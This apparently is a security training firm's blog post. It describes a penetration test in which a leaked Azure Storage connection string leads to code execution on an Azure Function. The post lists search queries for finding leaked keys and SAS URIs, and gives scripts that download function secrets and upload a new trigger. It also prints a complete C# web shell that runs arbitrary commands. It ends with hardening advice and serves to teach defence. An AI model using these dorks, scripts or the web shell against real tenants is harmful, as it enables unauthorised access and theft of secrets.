In this blog, Sunil Yadav, our lead trainer for the “Advanced Web Hacking” training class, will discuss a case study of remote code execution via Azure Storage when an Azure Function deployment is configured to run from a Storage Account using the WEBSITE_CONTENTSHARE app setting.
TL;DR
- Access a leaked Storage Account access key
- Connect to the Storage Account and download Blobs, Files, etc.
- The files contain the code of an Azure Function
- Create a new HTTP Trigger containing a web shell
- Upload the malicious file to Azure Files as a new Trigger and run OS commands.
Marketing
You can find more such scenarios in our Hacking and Securing Cloud Training.
Get in touch if you would like our consultancy service to audit/harden your cloud infrastructure.
Azure Storage Account Access Keys and SAS URIs
An Azure storage account uses credentials consisting of an account name and a key. The key is auto-generated when the storage account is created and serves as a password to connect to Azure Storage. The storage access keys, by default, have all permissions and are similar to the root password of your storage account.
An Azure storage account offers Blobs, Queues, Tables, and Files (shared folders or drives) as storage types, all of which can be accessed via an API.
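For reference, a leaked connection string bundles both pieces of information together. The standard format (the values below are placeholders) is:

DefaultEndpointsProtocol=https;AccountName=<accountname>;AccountKey=<base64-encoded-key>;EndpointSuffix=core.windows.net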
Additionally, Azure provides Shared Access Signature (SAS) URIs for granting fine-grained access to storage objects. With a SAS URI, one can control what data to expose, what permissions to grant on those objects (SignedPermission), and for how long the SAS URI is valid (SignedExpiry), along with other parameters, as shown below:
https://<accountname>.<service>.core.windows.net/?sv=2018-03-28&ss=bfqt&srt=sco&sp=rwdlacup&se=2019-09-30T17:13:23Z&st=2019-09-30T09:13:23Z&sip=88.208.222.83&spr=https&sig=LCoN4d%2B%2BZSzPtPO71fMS34k%2FhLf2Wjen9pzhlAGFfPU%3D
More details: https://docs.microsoft.com/en-us/rest/api/storageservices/create-account-sas
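To make those query parameters concrete, here is a minimal sketch of how such an account SAS can be generated with the Python azure-storage-blob SDK; the account name, key, and IP address are placeholders, and the keyword arguments map onto the srt, sp, st, se, and sip parameters of the URI above:

from datetime import datetime, timedelta
from azure.storage.blob import generate_account_sas, ResourceTypes, AccountSasPermissions

# Placeholder credentials - never hard-code real keys
account_name = "<accountname>"
account_key = "<account-key>"

sas_token = generate_account_sas(
    account_name=account_name,
    account_key=account_key,
    resource_types=ResourceTypes(service=True, container=True, object=True),  # srt=sco
    permission=AccountSasPermissions(read=True, write=True, delete=True, list=True,
                                     add=True, create=True, update=True, process=True),  # sp=rwdlacup
    start=datetime.utcnow(),                            # st
    expiry=datetime.utcnow() + timedelta(hours=8),      # se
    ip="88.208.222.83",                                 # sip
)
print(f"https://{account_name}.blob.core.windows.net/?{sas_token}")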
Finding Access Keys and SAS URIs
Access keys and SAS URIs are critical, and it is essential to protect them from unauthorized disclosure. However, there are instances where this information ends up in public sources. We have compiled a list of search queries that can be helpful in locating account names, keys, and SAS URIs.
Connection String (Account name and key)
https://github.com/search?l=XML&q=DefaultEndpointsProtocol%3Dhttps&type=...
https://github.com/search?q=StorageConnectStringBlob&type=Code
https://github.com/search?q=local.settings.json&type=Code
A good multi-site search interface is https://tools.redhuntlabs.com/online-ide-and-paste-search-tool.html, which can also be helpful for searching for access keys and SAS URIs.
Shared Access Signature - SAS URI
Github
https://github.com/search?q=rwdlacup&type=Code
Google
https://www.google.com/search?q=site:*.core.windows.net%20inurl:sig
https://www.google.com/search?q=site:*.{customdomain}.com%20inurl:sig
Additionally, these details can often be found within files such as:
- web.config
- local.settings.json
- app.config
Consider the following SAS URL. The signature expiry (se parameter) is set far in the future, and the token carries all available permissions on the file share object. If a malicious actor finds this URL, they can read, update, and delete all the objects in the storage account.
https://storageaccount.file.core.windows.net/XYZ-538d26??sv=2017-04-17&ss=bfqt&srt=sco&sp=rwdlacup&st=2019-09-30T19%3A43%3A56Z&se=2039-10-01T19%3A43%3A00Z&sig=WRo1i2cchlfVBCa%2FfwCqx3i%2BO64HSjbl%2F…..
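To illustrate the risk, a short sketch like the following (assuming the Python azure-storage-file-share package; the share name, SAS token, and file path are placeholders) is enough to start enumerating and pulling files with such a token:

from azure.storage.fileshare import ShareClient

# Placeholders - the account URL, share name, and SAS token come from the leaked URI
share = ShareClient(
    account_url="https://storageaccount.file.core.windows.net",
    share_name="<share-name>",
    credential="<sas-token>",
)

# List everything exposed at the root of the share
for item in share.list_directories_and_files():
    print(item.name)

# Any individual file can then be pulled down the same way
data = share.get_file_client("<path/to/interesting/file>").download_file().readall()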
Backdooring Azure Function Deployment
In one of our recent engagements, during the OSINT phase of the assessment, we identified an Azure Storage connection string (AccountName and AccountKey) leaked in a local.settings.json file within a publicly hosted GitHub repository, as shown in the figure below:
The next step was to validate the keys and identify the access.
To do this, we used Azure Storage Explorer (https://azure.microsoft.com/en-in/features/storage-explorer/) to connect to the storage account using a connection string.
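Azure Storage Explorer is the quickest way to do this interactively; a rough programmatic equivalent, assuming the Python azure-storage-blob and azure-storage-file-share packages, would look something like this:

from azure.storage.blob import BlobServiceClient
from azure.storage.fileshare import ShareServiceClient

# The leaked connection string (placeholder)
conn_str = "DefaultEndpointsProtocol=https;AccountName=<accountname>;AccountKey=<key>;EndpointSuffix=core.windows.net"

# If the key is still valid, these listings succeed and reveal what the account holds
blob_service = BlobServiceClient.from_connection_string(conn_str)
print("Blob containers:")
for container in blob_service.list_containers():
    print(" -", container.name)

share_service = ShareServiceClient.from_connection_string(conn_str)
print("File shares:")
for share in share_service.list_shares():
    print(" -", share.name)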
Surprisingly, the key worked, and it provided access to Azure Blobs, Files, Queues, and Tables, effectively giving us root-level access to the storage account.
We further investigated the storage objects, and the File Shares section contained the following structure, which caught our attention:
- ASP.NET
- data
- LogFiles
- root
- site
We got access to the source code (.csx, C# script files) of the Azure Functions for the HTTP and Blob Triggers inside the site\wwwroot directory, as shown below:
So far so good. Let’s explore further possibilities.
Let’s download the blob container (azure-webjobs-secrets) using the Azure CLI.
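The same step can also be scripted; a minimal sketch with the Python azure-storage-blob SDK (the connection string is a placeholder) that mirrors the container locally:

import os
from azure.storage.blob import BlobServiceClient

conn_str = "<leaked-connection-string>"  # placeholder
service = BlobServiceClient.from_connection_string(conn_str)
container = service.get_container_client("azure-webjobs-secrets")

# Mirror every blob in the container (host.json, per-function key files, etc.) locally
for blob in container.list_blobs():
    local_path = os.path.join("azure-webjobs-secrets", blob.name)
    os.makedirs(os.path.dirname(local_path), exist_ok=True)
    with open(local_path, "wb") as fh:
        fh.write(container.download_blob(blob.name).readall())
    print("downloaded", blob.name)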
We found the URL of an HTTP Trigger in the "host.json" file from the azure-webjobs-secrets container. The HTTP endpoint was active, and we could access it because the authorization level was set to Anonymous.
Now that we had permission to read and write objects, it was possible to overwrite the existing functions. However, as it was a production instance, we decided not to overwrite or replace the existing ones; instead, we chose a non-destructive approach and uploaded a simple hello world HTTP Trigger in a sub-folder, as shown below.
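For reference, a non-destructive upload along these lines can be scripted with the Python azure-storage-file-share package; the share name and the HelloWorldTrigger folder and file names below are illustrative:

from azure.storage.fileshare import ShareClient

conn_str = "<leaked-connection-string>"  # placeholder
share = ShareClient.from_connection_string(conn_str, share_name="<function-app-share>")

# Create a new function folder alongside the existing triggers under site/wwwroot
new_function = share.get_directory_client("site/wwwroot/HelloWorldTrigger")
new_function.create_directory()

# Upload the function definition and its code from the local working directory
for name in ("function.json", "run.csx"):
    with open(name, "rb") as fh:
        new_function.upload_file(name, fh)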
Surprisingly, the newly uploaded function was immediately up and running.
This confirmed that the Azure Function code and configuration are picked up from the file share.
Now let’s try to get code execution. To achieve this, we updated “run.csx” with web-shell code and uploaded it back to the HelloWorldTrigger folder.
Web-shell (run.csx)
#r "Newtonsoft.Json" using System.Net; using Microsoft.AspNetCore.Mvc; using Microsoft.Extensions.Primitives; using Newtonsoft.Json; using System; using System.IO; using System.Diagnostics; public static async Task<IActionResult> Run(HttpRequest req, ILogger log) { log.LogInformation("C# HTTP trigger function processed a request."); string cmd = req.Query["cmd"]; string requestBody = await new StreamReader(req.Body).ReadToEndAsync(); dynamic data = JsonConvert.DeserializeObject(requestBody); cmd = cmd ?? data?.cmd; return cmd != null ? (ActionResult)new OkObjectResult(ExcuteCmd(cmd)) : new BadRequestObjectResult("Please pass a name on the query string or in the request body"); } public static string ExcuteCmd(string arg) { ProcessStartInfo psi = new ProcessStartInfo(); psi.FileName = "cmd.exe"; psi.Arguments = "/c " + arg; psi.RedirectStandardOutput = true; psi.UseShellExecute = false; Process p = Process.Start(psi); StreamReader stmrdr = p.StandardOutput; string s = stmrdr.ReadToEnd(); stmrdr.Close(); return s; }
We can now access the web shell and execute arbitrary commands on the Azure Container.
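Invoking it is just an HTTP request against the anonymous endpoint; for example, with Python requests (the function URL is a placeholder):

import requests

# Placeholder URL of the anonymous HTTP trigger hosting the web shell
url = "https://<function-app>.azurewebsites.net/api/HelloWorldTrigger"

resp = requests.get(url, params={"cmd": "whoami"})
print(resp.text)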
So, in a few simple steps, by leveraging public information, we were able to obtain code execution within the Azure Function’s environment. Now that we have explored the damage potential, let’s look at how we can protect ourselves from such scenarios.
Securing access to storage accounts
- Regenerate storage account keys on a regular basis.
- Use Shared Access Signatures and Stored Access Policies to protect your data.
- Grant access at the container and blob level via a Shared Access Signature (SAS) for more fine-grained control over access to your blobs.
- Limit access to a specific IP address (or range of IP addresses).
- Attach an expiry time to SAS URIs (see the sketch after this list).
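As an illustration of the last three points, the following sketch (placeholders throughout, using the Python azure-storage-blob SDK) issues a read-only, blob-level SAS that is locked to a single IP address and expires after one hour:

from datetime import datetime, timedelta
from azure.storage.blob import generate_blob_sas, BlobSasPermissions

# Placeholders - scope the token to a single blob, read-only
sas_token = generate_blob_sas(
    account_name="<accountname>",
    container_name="<container>",
    blob_name="<blob-name>",
    account_key="<account-key>",
    permission=BlobSasPermissions(read=True),       # sp=r only
    expiry=datetime.utcnow() + timedelta(hours=1),  # short-lived
    ip="203.0.113.10",                              # single allowed IP
)
print(sas_token)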
Read More: https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide
References:
https://docs.microsoft.com/en-us/azure/azure-functions/functions-create-first-azure-function
https://docs.microsoft.com/en-us/azure/azure-functions/functions-deployment-technologies